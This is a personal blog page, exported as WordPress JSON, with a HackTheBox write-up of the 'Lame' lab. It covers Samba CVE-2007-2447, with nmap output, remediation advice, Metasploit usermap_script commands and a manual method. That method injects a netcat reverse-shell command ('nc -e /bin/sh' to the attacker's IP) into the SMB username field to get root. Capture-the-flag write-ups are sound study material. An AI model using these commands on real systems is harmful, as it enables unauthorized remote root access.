{"id":129,"date":"2023-02-17T00:52:20","date_gmt":"2023-02-17T00:52:20","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=129"},"modified":"2023-02-22T06:41:10","modified_gmt":"2023-02-22T06:41:10","slug":"lame","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=129","title":{"rendered":"Lame"},"content":{"rendered":"\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">&#8220;Lame&#8221; Report by\u00a0Zekken, HackTheBox, 2\/16\/2023<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Tags: Nmap Scan, SMB exploit\/escalation<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Vulnerability: <a rel=\"noreferrer noopener\" href=\"https:\/\/cve.report\/CVE-2007-2447\" target=\"_blank\">CVE-2007-2447<\/a>\u00a0\u201c&#8217;Username&#8217; map script&#8217; Command Execution\u201d<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">System: lame <\/mark><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">10.129.66.195<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Exploit and privilege escalation: This exploit allows for attackers to execute commands remotely after passing unfiltered input via MS-RPC calls towards \/bin\/sh when invoking external scripts. For the exploit to work, the &#8220;username map script&#8221; would have to be enabled in the smb.conf file.<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Remediations: Update Samba service to versions above 3.0.25rc3. If it is not possible to upgrade, a workaround would be to eliminate any external files in the smb.conf file.<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Severity:<\/mark> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-orange-color\">Medium<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Reconnaissance:<\/mark><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>eu-dedivip-2]\u2500&#91;10.10.14.49]\u2500&#91;htb-zekkenlol@htb-aad1iuxite]\u2500&#91;~]\n\u2514\u2500\u2500\u257c &#91;\u2605]$ <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-pale-cyan-blue-color\">nmap -A -Pn 10.129.66.195<\/mark>\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-02-17 00:04 GMT\nStats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.28% done; ETC: 00:05 (0:00:00 remaining)\nStats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.64% done; ETC: 00:05 (0:00:00 remaining)\nStats: 0:02:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.82% done; ETC: 00:06 (0:00:00 remaining)\nStats: 0:02:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 96.88% done; ETC: 00:07 (0:00:01 remaining)\nNmap scan report for 10.129.66.195\nHost is up (0.075s latency).\nNot shown: 996 filtered tcp ports (no-response)\nPORT    STATE SERVICE     VERSION\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">21<\/mark>\/tcp  open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.49\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">22<\/mark>\/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">139<\/mark>\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">445<\/mark>\/tcp open  netbios-ssn <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Samba smbd 3.0.20<\/mark>-Debian (workgroup: WORKGROUP)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h30m22s, deviation: 3h32m10s, median: 20s\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb-os-discovery: \n|   OS: Unix (<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Samba 3.0.20-Debian<\/mark>)\n|   NetBIOS computer name: \n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2023-02-16T19:05:21-05:00\n|_smb2-time: Protocol negotiation failed (SMB2)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 160.21 seconds<\/code><\/pre>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">After running the scan above, I used searchsploit on VSFTP 2.3.4. and Samba 3.0.20. <\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"736\" height=\"273\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-search.png\" alt=\"\" class=\"wp-image-132\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-search.png 736w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-search-300x111.png 300w\" sizes=\"(max-width: 736px) 100vw, 736px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">searchsploit results<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Metasploit had modules created for both, but the VSFTP module failed.<\/mark><\/p>\n\n\n\n<p> <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msf &gt; use exploit\/multi\/samba\/usermap_script\n\nmsf exploit(usermap_script) &gt; set TARGET 0\nmsf exploit(usermap_script) &gt; show options\n...\nmsf exploit(usermap_script) &gt; set RHOST \n10.129.66.195\nmsf exploit(usermap_script) &gt; set LHOST 10.10.14.49\nmsf exploit(usermap_script) &gt; exploit<\/code><\/pre>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Above are the changes I made after loading the Samba module<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">After running the exploit command, we got a root shell back. After obtaining root, we just had to cd to \/root and run the command below to get the flag and proof<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"776\" height=\"396\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-rootFile.png\" alt=\"\" class=\"wp-image-133\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-rootFile.png 776w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-rootFile-300x153.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/Lame-rootFile-768x392.png 768w\" sizes=\"(max-width: 776px) 100vw, 776px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Root Flag and Proof<\/mark><\/figcaption><\/figure>\n\n\n\n<p> <\/p>\n\n\n\n<p class=\"has-medium-font-size\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\"><strong>Without Metasploit:<\/strong><\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">(I came back because I need to get used to manual exploitation)<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">New Attacker IP: 10.10.14.32<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">New Target IP: 10.129.44.112<\/mark><\/p>\n\n\n\n<p> <\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">On the attacker machine we need to configure the \/etc\/samba\/smb.conf file<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We simply add the 2 lines on 26 and 27 as seen below<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"891\" height=\"595\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/1smbConfs.png\" alt=\"\" class=\"wp-image-146\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/1smbConfs.png 891w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/1smbConfs-300x200.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/1smbConfs-768x513.png 768w\" sizes=\"(max-width: 891px) 100vw, 891px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">smb configuration<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We can then attemp to login to samba as anonymous on the target machine<\/mark><\/p>\n\n\n\n<p> <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"819\" height=\"528\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/2smbAnon.png\" alt=\"\" class=\"wp-image-147\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/2smbAnon.png 819w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/2smbAnon-300x193.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/2smbAnon-768x495.png 768w\" sizes=\"(max-width: 819px) 100vw, 819px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">SMB Anon login<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We can see above that there is a share name for tmp<\/mark><\/p>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We can then connect to that share as seen below<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"830\" height=\"568\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/3smbHelp.png\" alt=\"\" class=\"wp-image-148\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/3smbHelp.png 830w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/3smbHelp-300x205.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/3smbHelp-768x526.png 768w\" sizes=\"(max-width: 830px) 100vw, 830px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">tmp help<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">On a seperate terminal, we can do the &#8220;searchsploit 3.0.20&#8221; command again and then do &#8220;searchsploit -m unix\/remote\/16320.rb&#8221; to copy the exploit file into our current directory.<\/mark> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We can then cat out the file to see its contents. The only think we need from the script is the highlighted section below.<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"743\" height=\"566\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/4scriptGrab.png\" alt=\"\" class=\"wp-image-149\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/4scriptGrab.png 743w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/4scriptGrab-300x229.png 300w\" sizes=\"(max-width: 743px) 100vw, 743px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">copy highlighted section<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">We can then go back to our first terminal and paste the code we copied and add &#8220;nc -e \/bin\/sh {attacker_IP} {attacker_port}&#8221;. You&#8217;ll have to add another single quotation mark, and it has to be the same one as in the beginning else it would not work. This command will connect the remote machine to our attacking machine.<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"657\" height=\"322\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/5smbLogonNoHup.png\" alt=\"\" class=\"wp-image-150\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/5smbLogonNoHup.png 657w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/5smbLogonNoHup-300x147.png 300w\" sizes=\"(max-width: 657px) 100vw, 657px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">netcat to attacker<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">On our second terminal, we can run the command below to listen to incoming connections.<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"508\" height=\"377\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/6netcat-attacker.png\" alt=\"\" class=\"wp-image-151\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/6netcat-attacker.png 508w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/6netcat-attacker-300x223.png 300w\" sizes=\"(max-width: 508px) 100vw, 508px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">attacker netcat listener<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Upon hitting enter on the smb terminal, we will get a connection on the attacking machine.<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"586\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/7initialaccess-1024x586.png\" alt=\"\" class=\"wp-image-152\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/7initialaccess-1024x586.png 1024w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/7initialaccess-300x172.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/7initialaccess-768x440.png 768w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/7initialaccess.png 1480w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">Access<\/mark><\/figcaption><\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">This will grant us with root privilege&#8217;s and we are allowed to freely enter the root directory to collect the flag, as well for the flag inside of the user directory.<\/mark><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"818\" height=\"398\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/8userflagproof.png\" alt=\"\" class=\"wp-image-153\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/8userflagproof.png 818w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/8userflagproof-300x146.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/8userflagproof-768x374.png 768w\" sizes=\"(max-width: 818px) 100vw, 818px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">User Flag<\/mark><\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"836\" height=\"390\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/9rootProof.png\" alt=\"\" class=\"wp-image-154\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/9rootProof.png 836w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/9rootProof-300x140.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2023\/02\/9rootProof-768x358.png 768w\" sizes=\"(max-width: 836px) 100vw, 836px\" \/><figcaption class=\"wp-element-caption\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-white-color\">root Flag again<\/mark><\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;Lame&#8221; Report by\u00a0Zekken, HackTheBox, 2\/16\/2023 Tags: Nmap Scan, SMB exploit\/escalation Vulnerability: CVE-2007-2447\u00a0\u201c&#8217;Username&#8217; map script&#8217; Command Execution\u201d System: lame 10.129.66.195 Exploit and privilege escalation: This exploit allows for attackers to execute commands remotely after passing unfiltered input via MS-RPC calls towards \/bin\/sh when invoking external scripts. For the exploit to work, the &#8220;username map script&#8221; would have to be enabled in the smb.conf file. Remediations: Update Samba service to versions above 3.0.25rc3. If it is not possible to upgrade, a workaround would be to eliminate any external files in the smb.conf file. Severity: Medium Reconnaissance: After running the scan above, I<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-129","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=129"}],"version-history":[{"count":4,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129\/revisions"}],"predecessor-version":[{"id":155,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129\/revisions\/155"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}